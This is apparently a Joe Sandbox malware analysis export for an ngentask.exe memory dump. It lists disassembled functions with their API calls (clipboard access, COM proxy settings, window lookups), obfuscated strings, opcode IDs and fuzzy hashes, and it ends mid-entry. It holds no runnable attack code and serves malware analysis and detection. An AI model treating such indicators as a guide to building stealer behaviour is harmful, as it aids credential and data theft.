                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ForegroundWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2020703349-0
                                                                                                                      • Opcode ID: be48297a947cafd24aad413243e9e9642570d7df916d39cec16fb6297b1b4795
                                                                                                                      • Instruction ID: d269cd60ec57109cef6505a058307629c74f5e3a7ebf775ef5c6d47ae3ed9ab2
                                                                                                                      • Opcode Fuzzy Hash: be48297a947cafd24aad413243e9e9642570d7df916d39cec16fb6297b1b4795
                                                                                                                      • Instruction Fuzzy Hash: 8601213A9583508FE324DB2AD44126ABA92AB8A305F08483DD982D7341D93889028B9B

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 270 439ddf-439df9 CoSetProxyBlanket
                                                                                                                      APIs
                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00439DF1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlanketProxy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3890896728-0
                                                                                                                      • Opcode ID: aa4dc9aeb2aac6ad379bb582322bd8c04ec0d7ac6b00bb7007832ed099619ace
                                                                                                                      • Instruction ID: 8e0993bda027286ab82495093d853fbb0d0f9e428c0d52a1ce927598f9c0f880
                                                                                                                      • Opcode Fuzzy Hash: aa4dc9aeb2aac6ad379bb582322bd8c04ec0d7ac6b00bb7007832ed099619ace
                                                                                                                      • Instruction Fuzzy Hash: DED04C347D4304BBF1310B14EC17F0535547747F03F201461B7857C0E18AF16611995E
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3861434553-0
                                                                                                                      • Opcode ID: d8b991163c7b0e0110516da00cc703152a1edba145b5b422256e62435027964e
                                                                                                                      • Instruction ID: 186d8afe7595d41557b92fe9ba1272d5117619c5063a4085c3627a12fa5ea572
                                                                                                                      • Opcode Fuzzy Hash: d8b991163c7b0e0110516da00cc703152a1edba145b5b422256e62435027964e
                                                                                                                      • Instruction Fuzzy Hash: 6BC09BFBE440045AD70027B5BC450CEB354EAC81397000573D61ED5413E635517545D6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,-$- 1'$CBA@$E|UX$H$OrvF$SRQY$^.s$`onm$kecn$nJjo$pwvu$rMnM$t{zy$vDL$wFkA$xmOT$znml${L}p$|$
                                                                                                                      • API String ID: 0-3082829593
                                                                                                                      • Opcode ID: 46fc4ddae59c42f2bec1145c203149dcdba483be0f597f81eba90ee5b336954d
                                                                                                                      • Instruction ID: 9779ffeb6b8a81ec734d8479c4d0d522fa62d7f05c387235cc8d142b68de0a8d
                                                                                                                      • Opcode Fuzzy Hash: 46fc4ddae59c42f2bec1145c203149dcdba483be0f597f81eba90ee5b336954d
                                                                                                                      • Instruction Fuzzy Hash: ACA202716083918FD724CF25D4907AFBBE2AFD6304F58892EE4C98B392D7789805CB56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #[#]$%C3E$.K1M$2a/c$4S4U$5O"A$:G Y$;e'g$E7HI$T1`3$TW$\3W5$b_(Q
                                                                                                                      • API String ID: 0-2643699812
                                                                                                                      • Opcode ID: 3cb2ab92c587ef23c3e23da19c85b142e6e3f12224995ef8766afe3e3fbf4a2e
                                                                                                                      • Instruction ID: 9c5e7d650131d79a7565773c7b78ebb0e5702fff2b8320420968a0bbec45ba09
                                                                                                                      • Opcode Fuzzy Hash: 3cb2ab92c587ef23c3e23da19c85b142e6e3f12224995ef8766afe3e3fbf4a2e
                                                                                                                      • Instruction Fuzzy Hash: CB91CCB46083908FD3208F26E88176BBBE0FF86719F54492DE5C89B351E7788842CB57
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
                                                                                                                      • API String ID: 0-3131871939
                                                                                                                      • Opcode ID: b7995fde9e1908a52ea5d26cf2d849ebd4c33492a31da251fcf359cc77123eac
                                                                                                                      • Instruction ID: 21d4b27a028d4d4ddeec7d042d62c3f9fb7f63177426393f51e4234b68456d89
                                                                                                                      • Opcode Fuzzy Hash: b7995fde9e1908a52ea5d26cf2d849ebd4c33492a31da251fcf359cc77123eac
                                                                                                                      • Instruction Fuzzy Hash: C6E2E2716083418FC718CF28C49436BBBE2AF95314F18867EE495AB3D1D778D949CB8A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (\QQ$(\QQ$BC@A$BC@A$FB[\$FB[\$W$XJ$W$XJ$[@Ar$[@Ar$[[PV$[[PV$tDYq$tDYq
                                                                                                                      • API String ID: 0-4000027297
                                                                                                                      • Opcode ID: ae39f447f0d4ce71628b31e1f5dc983b01162ac437195a421be4307255823ca2
                                                                                                                      • Instruction ID: 3976845d03887606f30b699428933fc9a00ef16a6c658f0ffb33c17f796ec726
                                                                                                                      • Opcode Fuzzy Hash: ae39f447f0d4ce71628b31e1f5dc983b01162ac437195a421be4307255823ca2
                                                                                                                      • Instruction Fuzzy Hash: EE12ABB48047819FD324AF39D296722BFB0AB12304F6446ADD4EA0F796D375940ACFD6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                                                      • API String ID: 0-3385986306
                                                                                                                      • Opcode ID: 193dcca42ce5b82e84e61127cc103a9640f48a3172cf1efa4fda8a059422e451
                                                                                                                      • Instruction ID: bb11d2dfe3237e36cf5f3331cb6bc72618a1c068451a123b6a5a4c7d41c3a196
                                                                                                                      • Opcode Fuzzy Hash: 193dcca42ce5b82e84e61127cc103a9640f48a3172cf1efa4fda8a059422e451
                                                                                                                      • Instruction Fuzzy Hash: 4882D6756093418FC719CF28C69431ABBE1AB85304F18897EE8D6A73D1D3B8DD05CB8A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "Qo$$%$'Y)W$(w4q$Ug$a$ps$Q_$US
                                                                                                                      • API String ID: 0-1517657186
                                                                                                                      • Opcode ID: db48c746725156d6f6a7437236bc49462d394272c498057fa7c81c489f4c8b4e
                                                                                                                      • Instruction ID: e6373a85cb02f6e078bcc90773bb4296628cd5e45be5ea5545782c43d670e834
                                                                                                                      • Opcode Fuzzy Hash: db48c746725156d6f6a7437236bc49462d394272c498057fa7c81c489f4c8b4e
                                                                                                                      • Instruction Fuzzy Hash: B73200B1648350CBD710CF24E89166BBBF1EF96354F08892DF4C58B3A1E7789945CB8A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #Ph$$Ph$:P*>$>$e{$y5$~}$9
                                                                                                                      • API String ID: 0-1947081359
                                                                                                                      • Opcode ID: 40615cf9abfa25e582db7780deced612d13e263efce829548beaa8e35488073b
                                                                                                                      • Instruction ID: ac3a32da69d80a167024953774dae0e943330d2acfc08ccbd3f545c58aef2271
                                                                                                                      • Opcode Fuzzy Hash: 40615cf9abfa25e582db7780deced612d13e263efce829548beaa8e35488073b
                                                                                                                      • Instruction Fuzzy Hash: 3CD12D726083914BD324CF29C89126BBBD2ABD5314F18C87EE4D59B791D73DC84E8B86
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1647500905-0
                                                                                                                      • Opcode ID: 26b7884f557a2746f62ff004eabefa3d9931e2d1e0f7bf6fe7b69128ee335c58
                                                                                                                      • Instruction ID: 1837353812a8e86b0fb0541b3a8676121ac9bf11c10da0ff377391a60270a56b
                                                                                                                      • Opcode Fuzzy Hash: 26b7884f557a2746f62ff004eabefa3d9931e2d1e0f7bf6fe7b69128ee335c58
                                                                                                                      • Instruction Fuzzy Hash: 1341B3B090C6819ED700AB78D44939EBFE0AF46304F04867AD4999B741D37DA558CBAB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (\QQ$BC@A$FB[\$W$XJ$[@Ar$[[PV$tDYq
                                                                                                                      • API String ID: 0-980740811
                                                                                                                      • Opcode ID: bfeace66cea1cacd67a85cfcda81f4497bbda8098cafef2ce8ed5ef24093d274
                                                                                                                      • Instruction ID: 58e1d5ebe3e0694e966824a20c61b9600778cbd76c65da536945e0c1700d6978
                                                                                                                      • Opcode Fuzzy Hash: bfeace66cea1cacd67a85cfcda81f4497bbda8098cafef2ce8ed5ef24093d274
                                                                                                                      • Instruction Fuzzy Hash: 9FD14DB48047419FD320AF399286753BFB0AB12300F554AAED4EA4F7A6D374941ACBD7
                                                                                                                      APIs
                                                                                                                      • FindWindowExW.USER32(00000000,?,?,00000000), ref: 0041DCBB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindWindow
                                                                                                                      • String ID: SQ$_]$
                                                                                                                      • API String ID: 134000473-3954728958
                                                                                                                      • Opcode ID: 743aa98a36c98baba9afc72abf711ffcd9c01d3838119340ef49dc9bf45c721e
                                                                                                                      • Instruction ID: d9e8bd2d8d317a42e5ec49ff7c452a2dcd6082122de2a4316046d7dd55c7460b
                                                                                                                      • Opcode Fuzzy Hash: 743aa98a36c98baba9afc72abf711ffcd9c01d3838119340ef49dc9bf45c721e
                                                                                                                      • Instruction Fuzzy Hash: 8EC125B9948311CFD3209F24D8817ABB7E1EF85315F04893DE4859B3A1D7789946CB4B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !3]$CR$TI$$
                                                                                                                      • API String ID: 0-3212265549
                                                                                                                      • Opcode ID: 8fccb5ed78a93f7a4e047e72b4a67e30eae647e4be54753b1ac114440c737d61
                                                                                                                      • Instruction ID: 44386a42ef0423ad7510f9aa78bca2fc96bd53a98e6408decd68b6f70294129f
                                                                                                                      • Opcode Fuzzy Hash: 8fccb5ed78a93f7a4e047e72b4a67e30eae647e4be54753b1ac114440c737d61
                                                                                                                      • Instruction Fuzzy Hash: 5E221174708351ABD730DF11E941BABB7E2EBC8304F54882EE9899B390D7B89845CB56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: $$$
                                                                                                                      • API String ID: 2994545307-533796878
                                                                                                                      • Opcode ID: 2a071475ffe3d5380dbb5278c2df51ed5b1a4397aa32772b2b9aae9ab646ffe7
                                                                                                                      • Instruction ID: 6753a23fd6165b827f91bacd85881790e3aded2fd112e0ca8af2d8699be4416c
                                                                                                                      • Opcode Fuzzy Hash: 2a071475ffe3d5380dbb5278c2df51ed5b1a4397aa32772b2b9aae9ab646ffe7
                                                                                                                      • Instruction Fuzzy Hash: 9BD149B9A882008FC7249F14D491ABF7792FB8A310F64553DE0D253365C37CD946CB5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$(6+'$6910431D5D6F41B70608286674507D91$DC
                                                                                                                      • API String ID: 0-2263128210
                                                                                                                      • Opcode ID: 4e4ee3513309a9faf15118a24aaf3dd1e549905e31e4cf6d1b50d257ba2e5d5d
                                                                                                                      • Instruction ID: 770e4f6945f516a0339da7008f4fa6d40a0b561d67b226599b3cee5f38f4c038
                                                                                                                      • Opcode Fuzzy Hash: 4e4ee3513309a9faf15118a24aaf3dd1e549905e31e4cf6d1b50d257ba2e5d5d
                                                                                                                      • Instruction Fuzzy Hash: 95D114716083409FD310DF65C84579FBBE2EBC5318F188E2DE4D89B391D779890A8B86
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                      • Opcode ID: d68769d38832ff43a91d3f031e4e9622ed4c93283567f94ea7bf24aada394559
                                                                                                                      • Instruction ID: e7b160778f9ec54d9b112390c7816de4f0c9d84f7e3a94cf802ef197df6bb8fa
                                                                                                                      • Opcode Fuzzy Hash: d68769d38832ff43a91d3f031e4e9622ed4c93283567f94ea7bf24aada394559
                                                                                                                      • Instruction Fuzzy Hash: DE5192B4E182089FDB40EFACD98569EBBF0BB48300F10856DE458E7350D734A945CF96
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -.$PY$;9$?=
                                                                                                                      • API String ID: 0-2855059432
                                                                                                                      • Opcode ID: a6f3e2ca6bfe04b43198fd0dcdb5daaed722b62a47790d91904bf4272bb981a0
                                                                                                                      • Instruction ID: 51c57b6d0beb2fc3002ded6013571b0f71cc0e468458301d8937ef5e388f5b0c
                                                                                                                      • Opcode Fuzzy Hash: a6f3e2ca6bfe04b43198fd0dcdb5daaed722b62a47790d91904bf4272bb981a0
                                                                                                                      • Instruction Fuzzy Hash: DEC1DEB8501B40CFE3208F26859578BBBF1FB11604F109A0CE5EA1BB91C774A44ACF96
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DC$bidh$
                                                                                                                      • API String ID: 0-1136523539
                                                                                                                      • Opcode ID: ddcb85b9b25ab2013000dd88c9709f243bd9e826e49d51198347e0a6a508ae26
                                                                                                                      • Instruction ID: f2257167311730e06d814e7221e7553dbe4635024cb3ffaee04f698e1ed39a51
                                                                                                                      • Opcode Fuzzy Hash: ddcb85b9b25ab2013000dd88c9709f243bd9e826e49d51198347e0a6a508ae26
                                                                                                                      • Instruction Fuzzy Hash: 6DB15972A083208BD710DF14E88173B73A2EF95354F9A852DE8C59B381E379DD05879A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$)$IEND
                                                                                                                      • API String ID: 0-588110143
                                                                                                                      • Opcode ID: 3ccf92ca3d1c6f40b8f70e1cbba77614f6c1119945a88c8342f75fd8a510d51d
                                                                                                                      • Instruction ID: 6340cc1672e157917752c6dca66b5422701e69e0103ca7cf805f0ccfb7bbc76e
                                                                                                                      • Opcode Fuzzy Hash: 3ccf92ca3d1c6f40b8f70e1cbba77614f6c1119945a88c8342f75fd8a510d51d
                                                                                                                      • Instruction Fuzzy Hash: AAE1BDB1A087019BE310DF29D88171ABBE0BB94308F14463EE5D4AB3C2D779E915CBD6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: f$
                                                                                                                      • API String ID: 2994545307-508322865
                                                                                                                      • Opcode ID: a3a2cbc03b058b4af98d16b69d493af32376e3672f3202d064ff84bcb6e52f15
                                                                                                                      • Instruction ID: e76ab74602f4687971b0939b18825c13b0cc92ac21aa0ac6b25134c02c101070
                                                                                                                      • Opcode Fuzzy Hash: a3a2cbc03b058b4af98d16b69d493af32376e3672f3202d064ff84bcb6e52f15
                                                                                                                      • Instruction Fuzzy Hash: 692203746093419FC714CF2AC890B2BBBE1BBC9314F189A2EF4A587391C738D805CB56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V^^n$kWeo
                                                                                                                      • API String ID: 0-2464879550
                                                                                                                      • Opcode ID: 9a4f898dd24805e610d32d95ca686e7e7874f7c8016c21d5bad20c2c69c2dc23
                                                                                                                      • Instruction ID: 6fa0a6f6551fff3048ddde94446ddbce8633058fccddcc1b1368fcefa3c6e798
                                                                                                                      • Opcode Fuzzy Hash: 9a4f898dd24805e610d32d95ca686e7e7874f7c8016c21d5bad20c2c69c2dc23
                                                                                                                      • Instruction Fuzzy Hash: 9DF134702047918BD7258F26D4A0733BBF1AF67304FA845AED4C78B792C779980ACB65
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: QFB$;:9
                                                                                                                      • API String ID: 0-2157042503
                                                                                                                      • Opcode ID: 36253e0703ba9fe598bbba1bee51164e12056d2cfce67fedea1061751af68b03
                                                                                                                      • Instruction ID: 40787000c266968bcd8442315732843066b36391672960b0a6f6844d46ab3f7a
                                                                                                                      • Opcode Fuzzy Hash: 36253e0703ba9fe598bbba1bee51164e12056d2cfce67fedea1061751af68b03
                                                                                                                      • Instruction Fuzzy Hash: C0D12FB16083208BC724DF25D85276BB7F1EFD2364F588A1CE8D58B390E7789801CB96
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @A$u|
                                                                                                                      • API String ID: 0-1424213698
                                                                                                                      • Opcode ID: 1f2ced1ed0f1ed9b1c4fb13284fb343f05fddca9131d1d74bd6d8213c8b59358
                                                                                                                      • Instruction ID: 931048a4458d0abfbc295f3ead734b0802221035c34180ce1df8209221ff6df0
                                                                                                                      • Opcode Fuzzy Hash: 1f2ced1ed0f1ed9b1c4fb13284fb343f05fddca9131d1d74bd6d8213c8b59358
                                                                                                                      • Instruction Fuzzy Hash: 52E11E726083518FC324CF29D88179BB7E1FBC4304F154A2DE9959B391DBB89A06CBC6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: d$l
                                                                                                                      • API String ID: 0-91452987
                                                                                                                      • Opcode ID: cfc013165ef0648a63da397ee148c5bfcab9e91ea3cce50d27f1fbe008c5977b
                                                                                                                      • Instruction ID: d9f537cc18cb400ada0e1ca4c04407e36999ac958c652f7c4ddeca09d11a0f41
                                                                                                                      • Opcode Fuzzy Hash: cfc013165ef0648a63da397ee148c5bfcab9e91ea3cce50d27f1fbe008c5977b
                                                                                                                      • Instruction Fuzzy Hash: C8E13971608350ABE310DF21ED81BABBBE4EBD1314F04892EF8C957281E679DC158B97
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $
                                                                                                                      • API String ID: 0-1425349742
                                                                                                                      • Opcode ID: bd454edc8cf098558b70c0e49182fa173854b92305fdd34751e44128b781663a
                                                                                                                      • Instruction ID: e0a55b096aea4560b2d6f4186fcaba9e7fd148264441248b81668e098e370aca
                                                                                                                      • Opcode Fuzzy Hash: bd454edc8cf098558b70c0e49182fa173854b92305fdd34751e44128b781663a
                                                                                                                      • Instruction Fuzzy Hash: 3AD1E0B5608340DFE7249F24E881B6FB7F1FB86304F94492DE58587262DB38D905CB8A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: zH}F$
                                                                                                                      • API String ID: 0-987448492
                                                                                                                      • Opcode ID: 1bdacec18f93a94b77de5c52221dc18fb1ca287a9f411cf4219dd7f7fcbaa4f1
                                                                                                                      • Instruction ID: a7ed96e80fa597e803c9b787d5aac206f28a645af99075a1e5a7bf3ad89faf97
                                                                                                                      • Opcode Fuzzy Hash: 1bdacec18f93a94b77de5c52221dc18fb1ca287a9f411cf4219dd7f7fcbaa4f1
                                                                                                                      • Instruction Fuzzy Hash: 0EC14575608250CFD3048F24E89162FBBE2EF86318F584A7DF49997391D739DA05CB8A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0$d
                                                                                                                      • API String ID: 0-1612544101
                                                                                                                      • Opcode ID: 02af58cfd1b400e8f41eeff3eb34a08905940d030acf83bd4927b504d697c8ba
                                                                                                                      • Instruction ID: ae5b4fcae11682e1a1d239a01d846dd17f598bd9ae64dc0cab92682f84a08f57
                                                                                                                      • Opcode Fuzzy Hash: 02af58cfd1b400e8f41eeff3eb34a08905940d030acf83bd4927b504d697c8ba
                                                                                                                      • Instruction Fuzzy Hash: B5719AB4A083009FD714CF14E49076BBBE6EF89304F24882EF9958B391C37AD845CB96
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: $
                                                                                                                      • API String ID: 2994545307-1425349742
                                                                                                                      • Opcode ID: 34e62cb45fe5b36b2b6f5c74e100c357ec8eefe135705cd1b4869fb971fe4574
                                                                                                                      • Instruction ID: 672198a99c993db8873dc901af7382d056dc10dc2a456ed110ce13ebf6d51b6d
                                                                                                                      • Opcode Fuzzy Hash: 34e62cb45fe5b36b2b6f5c74e100c357ec8eefe135705cd1b4869fb971fe4574
                                                                                                                      • Instruction Fuzzy Hash: 6E419C71F046005FD7249F28E841B2B77A2EBCD718F39A43EE5955B312D138EC11875A
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(B9CAA089), ref: 0042F326
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: f50d186f23bcb17534f085227635f0c3494dc82024b1910238da7a2875b6f59f
